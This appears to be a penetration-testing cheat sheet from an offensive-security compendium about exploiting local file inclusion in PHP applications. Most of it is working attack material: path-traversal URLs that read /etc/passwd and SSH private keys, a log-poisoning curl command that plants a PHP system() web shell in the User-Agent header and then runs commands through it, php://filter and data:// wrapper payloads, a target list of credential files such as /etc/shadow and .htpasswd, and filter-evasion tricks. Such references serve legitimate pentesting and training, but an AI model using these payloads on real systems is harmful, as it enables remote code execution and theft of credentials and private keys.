killchain-compendium/exploit/web/local_file_inclusion.md

3.1 KiB

Local File Inclusion

To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like https://test.com/?file=robots.txt, the file may be changed.

PHP Functions

  • Functions provoking an LFI
include()
require()
include_once ()
require_once()

Usage

  • Exploit URL parameter by including other files.
http://example.com/home?page=about.html
http://example.com/home?page=/etc/passwd
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
```
http://example.com/home?page=../../../../etc/passwd
```
or
```
http://example.com/home?page=html/../../../home/<username>/.ssh/id_rsa
```

Log Poisoning

  • Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce.
  • www-data needs read & write permisson in order to do so.
  • Include php code into the User-Agent header of the HTTP request. For example a GET parameter to deliver system commandsas follows
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
  • Follow up with a request to
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'

/proc/self/fd

  • outpost24
  • Log poisoning and opening logfile via /proc/self/fd/xx.

Files of Interest

  • /etc/issue

  • /etc/profile

  • /proc/version

  • /etc/passwd

  • /etc/apache2/.htpasswd

  • /etc/shadow

  • /etc/group

  • /etc/motd

  • /etc/mysql/my.cnf

  • /root/.bash_history

  • /var/log/dmessage

  • /var/mail/root

  • /root/.ssh/id_rsa

  • /var/log/apache2/access.log

  • C:\boot.ini

  • /proc/self/fd/xx

  • /proc/version

  • /proc/cmdline

  • /proc/[0-9]*/fd/[0-9]*

  • sess_<cookieValue> if the location of the session file is known. Some paths are

c:\Windows\Temp
/tmp/
/var/lib/php5
/var/lib/php/session

Base64 Encoding via PHP

  • Circumvent filter via encoding local files included ins a GET parameter value
  • Read PHP files through encoding them, so they won't be executed
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
  • Use encoded data as input through the parameter
curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=

Tricks

  • Terminate query with %00 or 0x00 does the trick until PHP 5.3.4
  • Terminate query with /.
  • ..//..//..//file, double slashes
  • URL encode path